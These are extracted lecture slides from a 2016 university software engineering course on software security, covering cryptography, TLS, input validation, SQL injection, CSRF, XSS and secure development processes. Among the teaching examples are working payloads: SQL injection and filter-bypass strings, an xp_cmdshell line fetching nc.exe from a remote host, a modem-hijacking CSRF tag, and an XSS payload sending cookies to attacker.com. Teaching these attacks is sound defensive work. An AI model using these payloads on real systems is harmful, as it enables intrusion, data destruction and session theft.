Software Securitywaldenj/classes/2016/fall/csc440/lectures/... · Security Patches A security patch...
Transcript of Software Securitywaldenj/classes/2016/fall/csc440/lectures/... · Security Patches A security patch...
Software Security
CSC 440/540: Software Engineering Slide #1
Topics1. Threats, Attacks, and Vulnerabilities2. Cryptography3. Transport Layer Security (TLS)4. Input Validation and Output Encoding5. Web Application Vulnerabilities6. Software Security7. Certifications and Standards8. Secure Development Life Cycle
CSC 440/540: Software Engineering Slide #2
Threats
IBM X-Force 2012 Trend and Risk Report
CSC 440/540: Software Engineering Slide #3
Vulnerabilities
CSC 440/540: Software Engineering Slide #4
Security PatchesA security patch is a software modification designed to prevent or limit a vulnerability. A patch is a type of mitigation.
Administrator may have to apply manually. Some vendors specify certain days to patch, such as
“Patch Tuesday,” the 2nd Tuesday of the month when MS releases updates.
Increasingly software auto updates itself with current patches.
CSC 440/540: Software Engineering Slide #5
SniffingPacket sniffing is when a program records wired or wireless network packets destined for other hosts.
Wireless traffic is available to everyone nearby. Antennas can extend range to miles. Wired traffic is accessible depending on network
location. If network location unsatisfactory, ARP spoofing can
redirect traffic to sniffing machine.Sniffing applications
Obtain passwords, session cookies, CC numbers, etc. As part of a more complex attack like MITM.
CSC 440/540: Software Engineering Slide #6
Man in the MiddleA man-in-the-middle attack is an active eaves-dropping attack, in which the attacker connects to both parties and relays messages between them.
CSC 440/540: Software Engineering Slide #7
Injection AttacksInjection attacks send code to a program instead of the data it was expected, then exploit a vulnerability in the software to execute the code.
Buffer overflows inject machine code into a process. Cross-site scripting injects JavaScript code into a web
page seen by another user. SQL injection injects SQL code into a database query run
by an application.
CSC 440/540: Software Engineering Slide #8
Attack SurfaceAttack surface: the set of ways an application can be attacked. The larger the attack surface of a system, the more likely an attacker is to exploit its vulnerabilities and the more damage is likely to result from attack.
Attack surface includes Network surface
All systems used by app: Cache, DB, DNS, email, web, etc. All open ports on all of those systems.
Application surface All input fields. Don’t forget about HTTP headers, URLs, etc.
Local surface (files, environment variables, IPCs)
CSC 440/540: Software Engineering Slide #9
How to secure a system1. Reduce vulnerabilities
Review design for mistakes leading to vulnerabilities. Review code for mistakes leading to vulnerabilities. Use secure third-party software components. Test application for vulnerabilities.
2. Reduce attack surface Eliminate unnecessary types of input. Require authentication to submit input. Validate all input from users. Sandbox system or individual system components.
CSC 440/540: Software Engineering Slide #10
Cryptography Algorithms to protect confidentiality of data
Symmetric encryption Public key encryption
Kerkhoff’s Principle The security of an encryption scheme should depend only
on the quality of the algorithm and the secrecy of the key. Algorithms to protect integrity of data
Message authentication codes, a/k/a Cryptographically secure hash functions
CSC 440/540: Software Engineering Slide #11
Symmetric EncryptionAlice and Bob share a secret key, which is used for both encryption and decryption. Advanced Encryption Standard (AES) is the standard symmetric algorithm.
encrypt decrypt
ciphertext
plaintext
sharedsecret
key
sharedsecret
key
CommunicationchannelSender Recipient
Attacker(eavesdropping)
plaintextAlice Bob
Is 128 bits enough?128-bit keyspace permits 2128 keys
340,282,366,920,938,463,463,374,607,431,768,211,456 or
3.4 x 1038 keysCracking 1 trillion (1012) keys per second requires
3.4 x 1026 seconds or 1.08 x 1019 years
Cracking 1 trillion keys per second on 1 billion CPUs requires 1.08 x 1010 years = 10.8 billion years
Note that this argument assumes all keys are equally likely to be used.
Public-Key CryptographySeparate keys for encryption and decryption.
encrypt decrypt
ciphertext
plaintext
publickey
privatekey
CommunicationchannelSender Recipient
Attacker(eavesdropping)
plaintext plaintext
Alice Bob
Is 128-bits enough? Public key encryption algorithms depend on the
difficulty of solving hard mathematical problems, such as factoring. These algorithms can be solved faster than by trying all of the keys.
Key length required depends on Public key algorithm Threat model
See keylength.com for recommendations.
CSC 440/540: Software Engineering Slide #15
Protect Information in all States1. Storage: information in permanent storage (disk or
tape) that is not currently being accessed.1. Filesystem and/or database encryption.
2. Processing: information in memory (RAM or cache) that is currently being used by a program.
1. Encrypt data before use.2. Delete or re-encrypt after use.
3. Transmission: information in transit between one node and another on a network.
1. Transport Layer Security used for web browser/servers.2. TLS also used for database and email connections.
CSC 440/540: Software Engineering Slide #16
Message Authentication CodesMACs ensure integrity of data.
1. A computes checksum of data + secret key.2. A sends data and checksum to B. 3. B computes checksum of data received + secret key
and compares with checksum sent by A.4. If checksums match, data was not altered in transit.
How is this secure? Only A and B have secret key. MITM attacker can only see data. If MITM tries to forge checksum, the checksum will be
only of data, not data + secret key.
CSC 440/540: Software Engineering Slide #17
RandomnessSecurity requires random (unpredictable) numbers for
Cryptographic keys Secrets to use in computing MACs Session IDs
Typical random() functions do not work for this. They are pseudo-random (predictable.) They do not generate enough bits of randomness. You
can’t securely generate a 128-bit key from a function that returns a 64-bit random integer.
Solution: use SecureRandom Almost every language has a secure random library.
CSC 440/540: Software Engineering Slide #18
Ruby’s SecureRandom classUses OS secure random generator
May use Ivy Bridge random number generator. Time between mouse, keyboard, disk, network events.
SecureRandom returns n random bytes in various formats: > irbirb(main):001:0> require 'securerandom'irb(main):002:0> b=SecureRandom.random_bytes(10)=> "3S\"\xB9;\xCBl=\x82,"irb(main):003:0> b=SecureRandom.hex(10)=> "a422e3eec304b54c8bd5"irb(main):004:0> b=SecureRandom.base64(10)=> "uq5UcUkhl6K3Tw=="irb(main):009:0> b=SecureRandom.urlsafe_base64(10)=> "EAVHlw_6EoOWmg"
CSC 440/540: Software Engineering Slide #19
Rails Secretsdatabase.yml
Store database username/password directly or export two variables to your environment,
export POSTGRES_USERNAME='username'export POSTGRES_PASSWORD='password'
then in your database.yml file you can dousername: <%= ENV['POSTGRES_USERNAME'] %>password: <%= ENV['POSTGRES_PASSWORD'] %>
secrets.yml Contains secret_key_base, which is used for
cryptographic checksum and encryption of cookies. Can set using environment variables too.
CSC 440/540: Software Engineering Slide #20
Transport Layer Security (TLS)TLS protocol provides security features for other protocols, such as HTTP, IMAP, etc.
1. Authentication of server to client (using certificate.)2. Optional authentication of client to server.3. Confidentiality (essential for passwords, cookies, &c.)4. Integrity (prevents attackers from modifying data.)
HTTPS is HTTP wrapped in TLS. TLS 1.0 was released in 1999. Old versions named SSL. Vulnerabilities exist in old versions of SSL/TLS. Use most recent version: TLS 1.2 (2008).
CSC 440/540: Software Engineering Slide #21
TLS CertificatesCertificates identify your server and enable encryption.
Your public encryption key. Your identity and domain name. A digital signature from a trusted third party verifying that
the public key is for the entity named in the identity.Certificate Authorities (CAs) are trusted 3rd parties
Web browsers contain lists of trusted CAs. Domain Validation: CA verified identity by sending an
email to an address at domain name to verify that the request for a certificate came from domain (may be free.)
Extended Validation: CA verifies existence of corporation and that it has control of specified domain (costs more.)
CSC 440/540: Software Engineering Slide #22
Deploying TLSObtain a TLS Certificate
1. Create a Certificate Signing Request (CSR) with OpenSSL.
2. Send to a Certificate Authority for verification.3. Deploy verified certificate on your web server.
Deployment Best Practices Try Mozilla SSL Configuration Generator See https://www.ssllabs.com/projects/best-practices/
for best practices on deploying TLS.Testing Your Deployment
Enter your URL at https://www.ssllabs.com/ssltest/
CSC 440/540: Software Engineering Slide #23
Attacks on TLSVersion and renegotiation attacks
Trick browser into using insecure SSL or cipher version.Man-in-the-middle attacks
Sslsniff, but will produce certificate warnings. Sslstrip converts https links to http links, so user
communicates in plaintext with middleman.Certificate attacks
Trick CA into issuing certificate to wrong person. Use crypto weaknesses to create certs for any site.
Implementation attacks Heartbleed(2014): OpenSSL memory reading attack.
CSC 440/540: Software Engineering Slide #24
Enable TLS in Rails on HerokuIn config/environments/production.rb, uncomment
config.force_ssl = trueThis will result in all pages being served using TLS.
Uses Heroku’s TLS certificate.
CSC 440/540: Software Engineering Slide #25
Input Validation PrinciplesNever trust input.
Assume dangerous until proven safe.Prefer rejecting data to filtering data.
Difficult to filter out all dangerous inputEvery component should validate data.
Trust is transitive. Don’t trust calling component. Don’t trust called component: shell, SQL
CSC 440/540: Software Engineering Slide #26
Validation TechniquesIndirect Selection
Allow user to supply index into a list of legitimate values. Application never directly uses user input. Most secure but cannot be applied to all inputs.
Whitelist List of valid patterns or strings. Input rejected unless it matches list. Secure and can be applied to all inputs.
Blacklist List of invalid patterns or strings. Input reject if it matches list. Least secure.
CSC 440/540: Software Engineering Slide #27
Output EncodingSome input is harmless to the application, but if sent as part of output is dangerous to the user.
User A makes a post containing JavaScript. Application stores post in database. User B views post. JavaScript from user A runs in User B’s browser.
Output encoding Replaces special characters (angle brackets, quotes, etc.)
with HTML entity encodings that browser will treat as text, not code.
Example: encoding > and < as > and < respectively.
CSC 440/540: Software Engineering Slide #28
Rails Validation Features By default, text is output encoded. What if you want to allow some HTML tags?
<%= raw post.body %> will bypass output encoding, but <%= sanitize post.body %> allows only safe HTML tags.
Sanitize removes dangerous HTML tags.2.3.0 :001 > helper.sanitize("<p>Hello</p>") => "<p>Hello</p>" 2.3.0 :002 > helper.sanitize("<script>alert('XSS');</script>") => "alert('XSS');"
ActionView::Base.sanitized_allowed_tags lists allowed.
CSC 440/540: Software Engineering Slide #29
OWASP Top 10 (2013)
CSC 440/540: Software Engineering Slide #30
Injection Injection attacks trick an application into including
unintended commands in the data send to an interpreter.
Interpreters Interpret strings as commands. Ex: SQL, shell (cmd.exe, bash), LDAP, XPath
Key Idea Input data from the application is executed as code by
the interpreter.
CSC 440/540: Software Engineering Slide #31
SQL Injection
1. App sends form to user.2. Attacker submits form
with SQL exploit data.3. Application builds string
with exploit data.4. Application sends SQL
query to DB.5. DB executes query,
including exploit, sends data back to application.
6. Application returns data to user.
Attacker
Web Server DB Server
Firewall
User
Pass
‘ or 1=1--
CSC 440/540: Software Engineering Slide #32
SQL Injection in PHP$link = mysql_connect($DB_HOST, $DB_USERNAME,
$DB_PASSWORD) or die ("Couldn't connect: " . mysql_error());
mysql_select_db($DB_DATABASE);$query = "select count(*) from users where username =
'$username' and password = '$password'";$result = mysql_query($query);
CSC 440/540: Software Engineering Slide #33
SQL Injection Attack #1Unauthorized Access Attempt:
password = ’ or 1=1 --
SQL statement becomes:select count(*) from users where username = ‘user’ and
password = ‘’ or 1=1 --Checks if password is empty OR 1=1, which is always true,
permitting access.
CSC 440/540: Software Engineering Slide #34
SQL Injection Attack #2Database Modification Attack:
password = foo’; delete from table users whereusername like ‘%
DB executes two SQL statements:select count(*) from users where username = ‘user’ and
password = ‘foo’delete from table users where username like ‘%’
CSC 440/540: Software Engineering Slide #35
Finding SQL Injection Bugs1. Submit a single quote as input. If an error results, app is vulnerable. If no error, check for any output changes.
2. Submit two single quotes. Databases use ’’ to represent literal ’ If error disappears, app is vulnerable.
3. Try string or numeric operators.
Oracle: ’||’FOO MS-SQL: ‘+’FOO MySQL: ’ ’FOO
2-2 81+19
49-ASCII(1)
CSC 440/540: Software Engineering Slide #36
Real Estate Site Hacking
www.website.com/fullnews.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(username,char(58),password),4,5/**/FROM/**/admin/*
Exploit against http://phprealestatescript.com/
CSC 440/540: Software Engineering Slide #37
The Problem: String BuildingBuilding a SQL command string with user input in any language is dangerous.
• Variable interpolation.• String concatenation with variables.• String format functions like sprintf().• String templating with variable replacement.
CSC 440/540: Software Engineering Slide #38
Ineffective Mitigation: BlacklistFilter out known bad SQL metacharacters,such as single quotes.Problems:
1. Numeric parameters don’t use quotes.2. URL escaped metacharacters.3. Unicode encoded metacharacters.4. Did you miss any metacharacters?
CSC 440/540: Software Engineering Slide #39
Bypassing Blacklist FiltersDifferent case
SeLecT instead of SELECT or selectBypass keyword removal filters
SELSELECTECTURL-encoding
%53%45%4C%45%43%54SQL comments
SELECT/*foo*/num/*foo*/FROM/**/ccSEL/*foo*/ECT
String Building‘us’||’er’chr(117)||chr(115)||chr(101)||chr(114)
CSC 440/540: Software Engineering Slide #40
Ineffective Mitigation: Stored ProceduresSQL Stored Procedures build strings too:CREATE PROCEDURE dbo.doQuery(@id nchar(128)AS
DECLARE @query nchar(256)SELECT @query = ‘SELECT cc FROM cust WHERE id=‘’’ + @id + ‘’’’EXEC @query
RETURN
and they can be invoked insecurely with user input:
exec sp_login ‘user’ ‘foo’; master..xp_cmdshell ‘tftp e.com GET nc.exe’#
CSC 440/540: Software Engineering Slide #41
Mitigation: WhitelistReject input that doesn’t match your list of safe characters to accept. Identify what’s good, not what’s bad. Reject input instead of attempting to repair. Still have to deal with single quotes when required,
such as in names.
CSC 440/540: Software Engineering Slide #42
Mitigation: Prepared Queriesrequire_once 'MDB2.php';
$mdb2 =& MDB2::factory($dsn, $options); if (PEAR::isError($mdb2)) {
die($mdb2->getMessage()); } $sql = “SELECT count(*) from users where username = ? and password =
?”;$types = array('text', 'text'); $sth = $mdb2->prepare($sql, $types, MDB2_PREPARE_MANIP); $data = array($username, $password); $sth->execute($data);
CSC 440/540: Software Engineering Slide #43
ActiveRecord SQLiString building is unsafe
User.where("email = '#{email}'") Product.where("name LIKE '%#{params[:search]}%'") User.where(“email=#{email} AND password=#{pass}“) Post.where(“id = #{id1} OR id = #{id2}”)
If you don’t build strings, you’re safe User.where(email: email) User.where("email = ?", email) Product.where("name LIKE ?”, params[:search]) User.where(email: email, password: pass) Post.where('id = 1').or(Post.where('id = 2'))
CSC 440/540: Software Engineering Slide #44
Cross-Site Request Forgery1. User authenticates to web application.2. User browses to another site containing a malicious
CSRF attack link somewhere in a web page. <img src=http://yourbank.com/transfer?amount=1000&to=hacker> Also works with iframe, link, bgsound, and other tags.
3. Browser accesses web app with cached credentials, performing whatever action specified by the link.
CSC 440/540: Software Engineering Slide #45
Example: DSL Modem AttackHome network devices administered via web apps. Standard local IPs.
Attacker inserts 1-pixel imgtag on page. src is URL of form submission,
giving remote admin.No password needed. Software owner assumed
device on trusted local network.
Of course, browser is on the local network too.
<img src= "http://192.168.1.254/Forms/remoteRES_1?NSS_RemotePassword=blehblah&NSS_EnableWANAdminAccessRES=on&timeoutDisable=0&Enable=Enable" alt="" width="1" height="1" />
CSC 440/540: Software Engineering Slide #46
Mitigating CSRF1. Include a random token in all forms that make requests
to alter data in your application and do not make any changes unless that token is returned.
Use <%= csrf_meta_tags %> in Rails views.Use protect_from_forgery with: :exception in controller.
2. Require that user re-authenticate for high value transactions.
3. Expire sessions quickly to reduce the attacker’s window of opportunity.
4. Use POST instead of GET for all actions that modify data. Add method :post as option in <%= link_to %> tags.
CSC 440/540: Software Engineering Slide #47
Cross-Site Scripting (XSS)Attacker causes a legitimate web server to send user executable content (Javascript, Flash ActiveScript) of attacker’s choosing.Impact of XSS
Account hijacking. Browser hijacking (malware hosting.) Information leakage (stored form values, etc.) Virtual defacement.
CSC 440/540: Software Engineering Slide #48
XSS ExampleWeb application sends browser to an error page after user clicks submit.
https://example.com/error.php?message=Sorry%2C+an +error+occurred
CSC 440/540: Software Engineering Slide #49
XSS ExampleThe error message is “reflected” back from the Web server to the client in a web page.
CSC 440/540: Software Engineering Slide #50
XSS ExampleWe can replace the error with JavaScript
https://example.com/error.php?message=<script>alert(‘xss’);</script>
CSC 440/540: Software Engineering Slide #51
Exploiting the Example1. User logins in and is issued a cookie2. Attacker feed the URL to user
https://example.com/error.php?message=<script>var+i=new+Image;+i.src=“http://attacker.com/”%2bdocument.cookie;</script>
CSC 440/540: Software Engineering Slide #52
Why does XSS Work?Same-Origin Policy
Browser only allows Javascript from site X to access cookies and other data from site X.
Attacker needs to make attack come from site X.Vulnerable Server Program
Any program that returns user input without filtering out dangerous code.
CSC 440/540: Software Engineering Slide #53
Anatomy of an XSS AttackWeb Server
3. XSS Attack
AttackerUser
4. User clicks on XSS link.
7. Browser runsinjected code.
Evil site saves ID.
CSC 440/540: Software Engineering Slide #54
XSS URL Exampleshttp://www.microsoft.com/education/?ID=MCTN&target=http://www.microsoft.com/education/?ID=MCTN&target="><script>alert(document.cookie)</script>
http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>alert(‘Test’);</script>
http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</script>&frompage=4&page=1&ct=VVTV&mh=0&sh=0&RN=1
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_text=_%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
CSC 440/540: Software Engineering Slide #55
Stored XSSInjected script stored in
Post or comment. Review. Uploaded file.
User views page with injected script. Malicious action is taken while user is logged into site
where malware found. Not technically cross-site.
Attack persists until injected code deleted.
CSC 440/540: Software Engineering Slide #56
Browser Exploitation Framework BeEF hooks browsers via XSS exploit
Can use as stored or reflected XSS. Hooked browsers are bots controlled by BeEF.
Exploitation modules run on hooked browsers to View browsing history. Identify authenticated sessions. Phishing and other social engineering attacks. Port scans of network browser is running on. Reverse proxy into network browser is running on. Attack targets via Metasploit exploitation framework.
CSC 440/540: Software Engineering Slide #57
BeEF Screenshot
CSC 440/540: Software Engineering Slide #58
Mitigating XSS1. Disallow HTML input2. Allow only safe HTML tags3. Encode output
Replace HTML special characters in outputex: replace < with < and > with >also replace (, ), #, &
4. Re-authenticate for important transactions to limit exposure to account hijacking.
5. Content Security Policy (CSP)
CSC 440/540: Software Engineering Slide #59
Why is Software Security poor?1. Security is seen as something that gets in the way of
software functionality.2. Security is difficult to assess and quantify.3. Security is often not a primary skill or interest of
software developers.4. Time spent on security is time not spent on adding
new and interesting functionality.5. Characteristics of modern software: the trinity of
trouble.
CSC 440/540: Software Engineering Slide #60
Trinity of TroubleConnectivity
Ubiquitous Internet; wireless & mobile computing.Complexity
Networked, distributed code that can interact with intermediate caches, ad proxies, etc.
Extensibility Systems evolve in unexpected ways, e.g. web browsers,
which support many formats, add-ons, plugins, programming languages, etc.
CSC 440/540: Software Engineering Slide #61
Software Security Objectives1. Dependability: software functions only as
intended; 2. Trustworthiness: No exploitable vulnerabilities or
malicious logic exist in the software;3. Resilience: If compromised, damage will be
minimized, and it will recover quickly to an acceptable level of operating capacity;
4. Conformance: to requirements and applicable standards and procedures.
CSC 440/540: Software Engineering Slide #62
System Security CertificationsSoftware system security certifications
Orange Book ISO 15408 Common Criteria PCI Data Security Standard (PCI DSS)
Many standards indirectly impact SSE FISMA (supersedes CSA of 1987) HIPAA (health information privacy) Gramm–Leach–Bliley Act (GLB) SOX (Sarbanes-Oxley)
CSC 440/540: Software Engineering Slide #63
Orange BookTrusted Computer System Eval Criteria
Issue in 1983 by NSA. Replaced by Common Criteria in 2005.
System classification levelsD: failed evaluation for higher level classificationC: discretionary protection Authentication, DAC, basic auditing
B: mandatory protection MAC, security policy requirements, auditing incl covert channels
A: verified protection Formal specification and design techniques with proofs
CSC 440/540: Software Engineering Slide #64
Common CriteriaISO standard 15408
International standard, used by US and others.
Protection Profile (PP) Description of system, e.g. anti-virus, firewall, smartcard
Evaluation Assurance Level (EAL)
CSC 440/540: Software Engineering Slide #65
PCI DSSPCI Data Security Standard (PCI DSS)
Proprietary security standard for organizations that handle card payment information for major credit and debit card companies.
Requirements Network security Cardholder data security Access control and auditing Security policy Vulnerability management, and Develop and maintain secure systems and applications
CSC 440/540: Software Engineering Slide #66
Secure Development Processes CLASP (Comprehensive, Lightweight Application
Security Process) Correctness-by-Construction (formal methods
based process from Praxis Critical Systems) MS SDL (Microsoft Secure Development Lifecycle) SSE CMM (Secure Software Engineering
Capability Maturity Model) TSP-Secure (Team Software Process for Secure
Software Development) Touchpoints
CSC 440/540: Software Engineering Slide #67
Security Development Lifecycle1. Code Reviews2. Risk Analysis3. Penetration Testing
SecurityOperations
Requirements Design Coding Testing Maintenance
RiskAnalysis
AbuseCases
Code Reviews +Static Analysis
PenetrationTesting
SecurityTesting
4. Security Testing5. Abuse Cases6. Security Operations
CSC 440/540: Software Engineering Slide #68
Verification Techniques and CostA
ssur
ance
Cost
PenetrationTesting
FormalVerification
SecurityTesting
CodeReview
StaticAnalysis
CSC 440/540: Software Engineering Slide #69
Code ReviewsA code review is an examination of source code by developers other than the author to find defects.Benefits
1. Find defects sooner in the lifecycle.2. Find defects with less effort than testing.3. Find different defects than testing.4. Educate developers about vulnerabilities.
Static analysis tools can assist in finding security bugs.
CSC 440/540: Software Engineering Slide #70
Code Review Process
PlanningAuthorModerator
Prep
Everyone
Meeting
Everyone
Rework
Author
Follow-upAuthorModerator
CSC 440/540: Software Engineering Slide #71
Security in Design1. Apply secure design principles throughout design
process, such as1. Least Privilege2. Fail-Safe Defaults3. Defense in Depth4. Separation of Privilege
2. Use secure design patterns where applicable.3. Perform an architectural risk analysis to evaluate the
security of your design and to identify design changes that need to be made to improve security.
CSC 440/540: Software Engineering Slide #72
Architectural Risk AnalysisFix design flaws, not implementation bugs.Risk analysis steps
1. Develop an architecture model (UML or DFDs).2. Identify threats and possible vulnerabilities.3. Develop attack scenarios.4. Rank risks based on probability and impact.5. Develop mitigation strategy.6. Report findings
CSC 440/540: Software Engineering Slide #73
Black Box TestingAdvantages of Black Box Testing
Examines system as an outsider would. Tester builds understanding of attack surface and
system internals during test process. Can use to evaluate effort required to attack system. Helps test items that aren’t documented.
SystemTest Input Test Output
CSC 440/540: Software Engineering Slide #74
White and Grey Box TestingWhite Box
Tester knows all information about system. Including source code, design, requirements. Most efficient technique. Avoids security through obscurity.
Grey Box Apply both white box and black box techniques.
Test Input Test Output
CSC 440/540: Software Engineering Slide #75
Penetration TestingBlack box test of deployed system.Allocate time at end of development to test.
• Often time-boxed: test for n days.• Schedule slips often reduce testing time.• Fixing flaws is expensive late in lifecycle.
Penetration testing tools• Test common vulnerability types against inputs.• Fuzzing: send random data to inputs.• Don’t understand application structure or purpose.
CSC 440/540: Software Engineering Slide #76
Security Testing
IntendendedFunctionality
ActualFunctionality
Functional testing will find missing functionality.
Injection flaws, buffer overflows, XSS, etc.
CSC 440/540: Software Engineering Slide #77
Security TestingTwo types of testing
Functional: verify security mechanisms.Adversarial: verify resistance to attacks generated during
risk analysis.Different from traditional penetration testing
• White box.• Use risk analysis to build tests.• Measure security against risk model.
CSC 440/540: Software Engineering Slide #78
Abuse CasesAnti-requirements
Think about what software should not do.A use case from an adversary’s point of view.
• Obtain Another User’s CC Data.• Alter Item Price.• Deny Service to Application.
Developing abuse casesInformed brainstorming: attack patterns, risks.
CSC 440/540: Software Engineering Slide #79
Connecting Use and Abuse CasesMitigates – A use case can mitigate the chance that a misuse case will complete successfully.Threatens – An abuse case can threaten a use case by exploiting it or hindering it.
Source: M. Imran Daud, “Secure Software Development Model: A Guide for Secure Software Life Cycle,” Proceedings of the International Multi Conference on Engineers and Computer Scientists, vol. I, March 2010.CSC 440/540: Software Engineering Slide #80
Security OperationsUser security notes
• Software should be secure by default.• Enabling certain features may have risks.• User needs to be informed of security risks.
Incident response• What happens when a vulnerability is reported?• How do you communicate with users?• How do you send updates to users?
CSC 440/540: Software Engineering Slide #81
References1. Cade Cairns and Daniel Somerfield, The Basics of
Web Application Security, http://martinfowler.com/articles/web-security-basics.html, 2016.
2. Michael Howard and Steve Lipner, The Security Development Lifecycle, Microsoft Press, 2006.
3. Gary McGraw, Software Security, Addison-Wesley, 2006.
4. Ruby on Rails Security Guide, http://guides.rubyonrails.org/security.html, 2016.
CSC 440/540: Software Engineering Slide #82